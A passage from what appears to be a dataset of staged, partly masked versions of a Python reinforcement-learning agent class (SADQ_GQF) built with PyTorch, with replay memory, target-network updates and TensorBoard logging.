% self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-3": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-4": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-5": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\n\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\n\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\n\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n #self.choices = choices\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n\n self.features = 0\n self.feature_len = feature_len\n # Global\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = self.reinforce_config.summaries_path + \"/\" + self.name\n\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n \n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)\n# self.target_model.eval_mode()\n\n self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,\n initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,\n initial_p=self.reinforce_config.starting_epsilon,\n final_p=self.reinforce_config.final_epsilon)\n\n# def __del__(self):\n# self.save()\n# self.summary.close()\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name,\n scalar_value=self.epsilon,\n global_step=self.steps)\n\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy = False, is_random = False):\n \n if self.learning:\n self.steps += 1\n # add to experience\n if self.previous_state is not None and self.learning and self.current_reward is not None:\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state_crr.reshape(-1, self.state_length), 0,\n self.features)\n# print(\"not final : {}\".format(self.current_reward) )\n# print(0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n# print(\"q_value : {}\".format(q_values))\n# input()\n if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:\n logger.debug(\"Replacing target model for %s\" % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n# self.target_model.eval_mode()\n\n if (self.learning and\n self.steps > self.reinforce_config.update_start and\n self.steps % self.reinforce_config.update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n\n self.current_reward = 0\n self.previous_state = state[action]\n #self.previous_action = action\n\n return choice, fv#,q_values\n\n def disable_learning(self, is_save = False):\n logger.info(\"Disabled Learning for %s agent\" % self.name)\n if is_save:\n# self.save()\n self.save(force = True)\n self.learning = False\n self.episode = 0\n \n def enable_learning(self):\n logger.info(\"enabled Learning for %s agent\" % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n# print(\"end:\")\n# print(self.current_reward)\n# input()\n episode_time = time.time() - self.episode_time\n\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n\n logger.info(\"End of Episode %d, \"\n \"Total reward %.2f, \"\n \"Epsilon %.2f\" % (self.episode + 1,\n self.total_reward,\n self.epsilon))\n\n logger.debug(\"Episode Time: %.2fs (%.2fs), \"\n \"Prediction Time: %.2f, \"\n \"Update Time %.2f\" % (episode_time,\n avg_time,\n self.prediction_time,\n self.update_time))\n\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward,\n global_step=self.episode)\n\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state.reshape(-1, self.state_length), 1,\n self.features)\n# print(\"final : {}\".format(self.current_reward) )\n# input()\n# print(1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + \"/adaptive.info\"\n if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:\n logger.info(\"Restoring state from %s\" % self.network_config.network_path)\n\n with open(restore_path, \"rb\") as file:\n info = pickle.load(file)\n\n self.steps = info[\"steps\"]\n# self.best_reward_mean = info[\"best_reward_mean\"]\n self.episode = info[\"episode\"]\n self.memory.load(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n\n def save(self, force=False, appendix=\"\"):\n info = {\n \"steps\": self.steps,\n \"best_reward_mean\": self.best_reward_mean,\n \"episode\": self.episode\n }\n \n if (len(self.reward_history) >= self.network_config.save_steps and\n self.episode % self.network_config.save_steps == 0) or force:\n\n total_reward = sum(self.reward_history[-self.network_config.save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n\n if force: #or current_reward_mean >= self.best_reward_mean:\n print(\"*************saved*****************\", current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info(\"Saving network. Found new best reward (%.2f)\" % total_reward)\n self.eval_model.save_network(appendix = appendix)\n self.target_model.save_network(appendix = appendix)\n# self.eval_model.save_network()\n# self.target_model.save_network()\n with open(self.network_config.network_path + \"/adaptive.info\", \"wb\") as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n else:\n logger.info(\"The best reward is still %.2f. Not saving\" % self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n \n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n# self.eval_model.train_mode()\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name,\n scalar_value=beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states,\n is_terminal, weights, batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes),\n global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector) = batch\n\n states = FloatTensor(states)\n# print(states.size())\n# next_states = FloatTensor(next_states)\n terminal = FloatTensor([1 if t else 0 for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size,\n dtype=torch.long)\n # Current Q Values\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n \n q_max.append(q_value_max)\n if self.network_config.version in [\"v10\", \"v11\"]:\n# print(features_max)\n# print(ns[idx, 63:67])\n# print(states[i, 63:67])\n# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), 